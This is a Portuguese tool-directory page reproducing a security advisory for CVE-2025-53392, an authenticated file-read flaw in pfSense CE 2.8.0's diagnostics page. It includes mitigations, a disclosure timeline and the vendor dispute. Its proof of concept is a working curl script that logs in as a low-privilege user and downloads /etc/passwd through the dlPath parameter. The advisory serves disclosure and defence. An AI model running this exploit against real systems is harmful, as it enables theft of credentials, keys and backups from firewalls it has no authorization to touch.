Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pfsense-security-research — Leitura Arbitrária de Arquivos Autenticada no pfSense 2.8.0 via Interface Web de Diagnóstico (CVE-2025-53392) | Kitploit
Ferramentas/GitHubGitHub/skraft9/pfsense-security-research
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubskraft9/pfsense-security-research

pfsense-security-research

Leitura Arbitrária de Arquivos Autenticada no pfSense 2.8.0 via Interface Web de Diagnóstico (CVE-2025-53392)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
14há 7 mesesAinda não revisado

Leitura Arbitrária de Arquivos Autenticada no pfSense 2.8.0 via Interface Web de Diagnóstico

ID CVE: CVE-2025-53392

Data: 2025-06-27

Autor: Seth Kraft

Homepage do Fornecedor: https://www.netgate.com/

Changelog do Fornecedor: https://docs.netgate.com/pfsense/en/latest/releases/

Link do Software: https://www.pfsense.org/download/

Versão: pfSense CE 2.8.0

ID CWE: CWE-36 (Travessia de Caminho Absoluto)

Pontuação Base CVSS: 6.5 (Média)

Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Tipo: Leitura Arbitrária de Arquivos Autenticada / Divulgação de Arquivos Locais


Autorização

Apenas para fins de teste e pesquisa autorizados. Não teste nem explore esta vulnerabilidade em sistemas que você não possua ou para os quais não tenha permissão explícita para testar.


Resumo

O pfSense CE 2.8.0 contém uma vulnerabilidade de Divulgação de Arquivos Locais na página de diagnóstico diag_command.php, que permite que usuários autenticados baixem arquivos arbitrários do sistema de arquivos subjacente.

Essa funcionalidade não possui nenhuma sanitização de caminho, restrição de diretório ou controles de acesso além da atribuição de permissões.


Detalhes

A lógica vulnerável está localizada no arquivo src/usr/local/www/diag_command.php:

root@kitploit:~
if ($_POST['submit'] == "DOWNLOAD" && file_exists($_POST['dlPath'])) {
    session_cache_limiter('public');
    send_user_download('file', $_POST['dlPath']);
}

Não há verificações de segurança nem medidas de sanitização aplicadas ao parâmetro dlPath controlado pelo usuário.

Qualquer caminho de arquivo que o processo PHP possa ler será enviado de volta ao usuário.


Prova de Conceito

Criar o grupo low-priv e atribuir uma única permissão (WebCfg - Diagnostics: Command) Screenshot 2025-06-27 133201

Embora eu reconheça a presença de um aviso de segurança para a permissão WebCfg - Diagnostics: Command, avisos por si só não substituem um controle de acesso sólido.

A frase “Permitir acesso à página de Comandos de Diagnóstico” é ambígua e subestima o risco, ela permite execução irrestrita de comandos em nível de root, e não apenas acesso de diagnóstico.

Os rótulos de permissões em uma interface web devem refletir com precisão o escopo e a gravidade das ações que permitem, especialmente quando expõem controle administrativo total.

Atribuir o grupo low-priv ao usuário dev Screenshot 2025-06-27 133218

Esta prova de conceito demonstra que um usuário com apenas a permissão WebCfg - Diagnostics: Command pode exfiltrar /etc/passwd abusando do parâmetro dlPath sem sanitização.

root@kitploit:~
# 1. Start session and extract CSRF token
curl -k -c cookies.txt -s https://<IP>/diag_command.php > login_page.html
csrf_token=$(grep '__csrf_magic' login_page.html | grep 'value=' | sed -E 's/.*value="([^"]+)".*/\1/')

# 2. Authenticate as low-privileged user "dev"
curl -k -b cookies.txt -c cookies.txt \
  -d "__csrf_magic=$csrf_token" \
  -d "usernamefld=dev" \
  -d "passwordfld=pass" \
  -d "login=Sign+In" \
  https://<IP>/index.php > /dev/null

# 3. Get CSRF token post-login
curl -k -b cookies.txt -s https://<IP>/diag_command.php > diag_authed.html
csrf_token=$(grep '__csrf_magic' diag_authed.html | grep 'value=' | sed -E 's/.*value="([^"]+)".*/\1/')

# 4. Exfiltrate arbitrary file (example: /etc/passwd)
curl -k -b cookies.txt -s -X POST https://<IP>/diag_command.php \
  -d "__csrf_magic=$csrf_token" \
  -d "submit=DOWNLOAD" \
  -d "dlPath=/etc/passwd"

Demonstração

pfSense-authenticated-file-disclosure-poc


Impacto

Qualquer usuário do pfSense com a permissão WebCfg - Diagnostics: Command atribuída pode:

  • Ler arquivos locais sensíveis do sistema
  • Extrair backups, credenciais e chaves
  • Acessar arquivos muito além de suas permissões pretendidas

Isso viola o princípio do menor privilégio e quebra os limites lógicos de privilégio.


Mitigação Sugerida

  1. Restringir dlPath a um diretório base seguro (por exemplo, /tmp) usando realpath() e verificação de prefixo
  2. Remover ou bloquear caminhos com .. ou caminhos absolutos
  3. Permitir apenas downloads de arquivos em uma lista de permissões ou em um diretório temporário de artefatos

Linha do Tempo da Divulgação

  • 2025-06-26: Vulnerabilidade relatada à Netgate
  • 2025-06-27: A Netgate respondeu, descartando o problema como comportamento pretendido
  • 2025-06-27: O pesquisador respondeu com uma refutação técnica; o fornecedor reiterou o descarte
  • 2025-06-27: O pesquisador iniciou a divulgação pública devido ao descarte final do fornecedor e solicitou à MITRE a atribuição do CVE
  • 2025-06-28: A MITRE atribuiu o CVE-2025-53392 com a marcação "contestado pelo fornecedor"

Resposta da Netgate

Embora o fornecedor afirme que o acesso a esta página equivale a root, isso confunde permissões em nível web com acesso irrestrito ao backend.

Os privilégios devem ser aplicados tecnicamente (e não presumidos), e avisos na interface não substituem um design seguro.


Contestando a afirmação do fornecedor de que essa funcionalidade é "bem documentada" - não encontrei nenhuma menção na documentação de Privilégios de Usuário do pfSense que afirme que a permissão WebCfg - Diagnostics: Command equivale a acesso em nível de root. Screenshot 2025-06-28 235613


O fornecedor pode ter se referido à página de Comandos de Diagnóstico, que inclui um aviso geral sobre uso indevido.

Mas a documentação não vincula explicitamente essa funcionalidade à permissão WebCfg - Diagnostics: Command nem esclarece que ela concede acesso em nível de root.


Expectativas de Segurança para Interfaces de Diagnóstico

O módulo de diagnóstico na interface web de um firewall deve conter proteções adequadas para impedir abusos contra o sistema operacional subjacente.

  • Os comandos de diagnóstico devem ser funcionalmente limitados a ping, traceroute, visualização de logs, etc.
  • Os comandos devem ser executados em um shell restrito ou chroot.
  • O acesso a arquivos deve ser explicitamente limitado a diretórios seguros (/tmp, /var/log).
  • As permissões devem ser granulares e ter escopo claro.

Aviso Legal

Este trabalho foi realizado fora do meu vínculo empregatício e reflete meus esforços pessoais em pesquisa de segurança cibernética.

Baixar ferramenta